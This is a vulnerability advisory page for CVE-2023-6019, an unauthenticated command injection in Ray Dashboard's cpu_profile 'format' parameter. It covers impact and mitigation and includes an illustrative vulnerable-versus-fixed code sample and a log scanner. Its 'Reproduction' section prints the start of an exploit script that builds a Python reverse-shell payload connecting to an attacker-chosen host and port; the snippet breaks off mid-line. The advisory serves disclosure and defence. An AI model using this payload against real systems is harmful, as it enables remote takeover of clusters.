VYPR
Critical severity · NVD Advisory · Published Nov 16, 2023 · Updated Aug 2, 2024

Ray Command Injection in cpu_profile Parameter

CVE-2023-6019

Description

Unauthenticated remote command injection in Ray Dashboard's cpu_profile parameter before 2.8.1.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.


Root cause

CVE-2023-6019 is a command injection vulnerability in the Ray Dashboard's cpu_profile URL parameter. The parameter is not properly sanitized, allowing an attacker to inject arbitrary OS commands. This issue affects Ray versions prior to 2.8.1 [1].

Exploitation

An attacker can exploit this vulnerability by sending a crafted HTTP request to the Ray Dashboard without any authentication. No special privileges or network position beyond access to the dashboard are required. The dashboard is intended to be accessible only within a trusted network, but exposure to the internet or untrusted networks enables remote exploitation [3].

Impact

Successful exploitation allows the attacker to execute arbitrary commands on the underlying operating system with the privileges of the Ray Dashboard process. This can lead to full compromise of the Ray cluster, data exfiltration, or further lateral movement within the network [1][3].

Mitigation

The vulnerability is fixed in Ray version 2.8.1 [2]. Users should upgrade immediately. For deployments where upgrading is not possible, ensure that the Ray Dashboard is not exposed to untrusted networks, as Ray's security model relies on network-level access control [3].

AI Insight generated on May 20, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected packages

Versions sourced from the GitHub Security Advisory.

| Package | Ecosystem | Affected versions | Patched versions |
|---------|-----------|-------------------|------------------|
| ray     | PyPI      | < 2.8.1           | 2.8.1            |

Affected products (2)

  • ghsa-coords
    Range: < 2.8.1
  • ray-project/ray-project/rayv5
    Range: unspecified

Patches (0)

No patches discovered yet.

Vulnerability mechanics

Root cause

"The 'format' parameter in the CPU profiling endpoint is not validated, allowing for OS command injection."

Attack vector

An unauthenticated attacker can send a crafted HTTP GET request to the Ray dashboard's `/worker/cpu_profile` endpoint. By injecting shell metacharacters and a base64-encoded payload into the `format` parameter, the attacker can execute arbitrary commands on the server. The exploit targets the `format` parameter, which is incorporated directly into a system command without proper sanitization [ref_id=1].

Affected code

The vulnerability resides in the CPU profiling functionality of the Ray dashboard, specifically how the `format` parameter is handled. The `format` parameter is directly inserted into a system command executed in a shell, leading to command injection [ref_id=1].

What the fix does

The advisory indicates that the vulnerability is fixed in version 2.8.1 and later. While a specific patch diff is not provided, the fix likely involves input validation on the `format` parameter to prevent the injection of shell metacharacters and ensure that only expected formats are processed. This prevents the construction of malicious OS commands [ref_id=1].
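To make the flawed pattern and the described fix concrete, here is an added illustration (not Ray's own code, and not from this advisory): a hypothetical command builder in the vulnerable shape (untrusted `format` spliced into a shell string) beside a hardened one (allowlisted value, argv list, no shell), plus a small scanner that flags dashboard access-log requests whose `format` value is off the allowlist or contains shell metacharacters. The profiler binary name, the allowlisted formats and the log lines are all assumptions constructed for this example.

```python
import re
from typing import List
from urllib.parse import urlsplit, parse_qs

# Illustrative allowlist; the real accepted values are not stated on this page.
ALLOWED_FORMATS = {"flamegraph", "raw"}
SHELL_META = re.compile(r"[;&|`$()<>\n\\]")

def build_profile_command_vulnerable(pid: int, duration: int, fmt: str) -> str:
    # Flawed pattern: untrusted `fmt` is spliced into a string that a shell parses,
    # so any metacharacter in it becomes part of the command.
    # "profiler" is a stand-in name for the profiling binary (assumption).
    return f"profiler record -p {pid} -d {duration} --format {fmt}"

def is_valid_format(fmt: str) -> bool:
    # Allowlist check: exact membership, not a metacharacter denylist.
    return fmt in ALLOWED_FORMATS

def build_profile_command_fixed(pid: int, duration: int, fmt: str) -> List[str]:
    # Hardened form: validate, then return an argv list for subprocess.run(..., shell=False),
    # so no shell ever re-parses the values.
    if not is_valid_format(fmt):
        raise ValueError(f"unsupported profile format: {fmt!r}")
    if pid <= 0 or duration <= 0:
        raise ValueError("pid and duration must be positive")
    return ["profiler", "record", "-p", str(pid), "-d", str(duration), "--format", fmt]

def suspicious_cpu_profile_requests(log_lines: List[str]) -> List[str]:
    """Return request targets hitting /worker/cpu_profile whose `format` value is
    off the allowlist or carries shell metacharacters (combined-log-format input)."""
    hits = []
    for line in log_lines:
        m = re.search(r'"(?:GET|POST) (\S+)', line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        if not url.path.endswith("/worker/cpu_profile"):
            continue
        for value in parse_qs(url.query).get("format", []):
            if not is_valid_format(value) or SHELL_META.search(value):
                hits.append(m.group(1))
                break
    return hits

# Constructed sample log lines (not real traffic). The second one's `format`
# value contains a URL-encoded `;`, the kind of metacharacter described above.
SAMPLE_LOG = [
    '10.0.0.5 - - [16/Nov/2023:10:00:01 +0000] "GET /worker/cpu_profile?pid=42&duration=5&format=flamegraph HTTP/1.1" 200 1234',
    '198.51.100.7 - - [16/Nov/2023:10:00:09 +0000] "GET /worker/cpu_profile?pid=42&duration=5&format=flamegraph%3Bid HTTP/1.1" 500 0',
    '10.0.0.5 - - [16/Nov/2023:10:00:12 +0000] "GET /nodes?view=summary HTTP/1.1" 200 5678',
]
```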

Preconditions

  • network: The Ray dashboard must be accessible over the network.
  • auth: No authentication is required to access the vulnerable endpoint.
  • config: If the system is configured to allow passwordless sudo, the attacker can obtain a root shell; otherwise, a user-level shell is returned [ref_id=1].

Reproduction

```python
# !usr/bin/python3
# coding=utf-8
import base64
import argparse
import requests
import urllib3

def exp(target, ip, lhost, lport):
    payload = 'python3 -c \'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\' + lhost + '\',' + lport + '));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(\
```

Generated on Jun 4, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.

References (5)

News mentions (0)

No linked articles in our index yet.